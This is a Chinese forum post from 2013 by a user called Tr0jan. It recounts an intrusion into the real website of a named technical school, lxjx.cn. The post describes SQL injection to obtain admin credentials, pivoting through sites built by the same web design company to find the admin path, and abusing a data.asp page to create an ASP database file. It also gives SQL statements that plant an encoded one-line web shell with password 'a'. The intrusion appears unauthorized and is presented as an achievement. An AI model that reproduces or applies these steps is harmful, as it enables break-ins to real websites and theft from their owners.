本帖最后由 Tr0jan 于 2013-5-31 15:24 编辑
作者:Tr0jan
博客:http://nono.so
————————————————————————————————————————–
————————————————————————————————————————–
目标:www.lxjx.cn 蓝翔技校
过程:判断下网站大概情况
最后筛选从jixiechang.lxjx.cn入手,注入得出后台帐号密码admin xxoo,但是各种工具跑不出后台,在页面最下方发现网站建设公司
通过对该公司的其他网站的检测,过程比较繁琐,一个一个测试,最后通过旁注得到该公司旗下某个站的SHELL,发现该站的后台目录/cnsail
得到此目录,打开我们的jixiechang.lxjx.cn/cnsail
没发现可利用的地方,对/cnsail目录下进行进一步扫描,得到/cnsail/inc/data.asp
这里我们创建一个ASP后缀的数据库f4ck.asp点击创建之后进入
我们执行
1、Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
2、Insert INTO temp (cmd) VALUES(‘┼攠數畣整爠煥敵瑳∨≡┩愾’); //把编码后的一句话木马插入到temp表(密码a)
然后我们连接jixiechang.lxjx.cn/f4ck.asp
没有继续渗透下去,里面黑客太多,至此结束。
从网站提取的数据库操作脚本
数据库连接脚本data.txt (21.16 KB, 下载次数: 18)
- 555555.jpg (263.51 KB, 下载次数: 0)
转载请注明:jinglingshu的博客 » 渗透蓝翔Web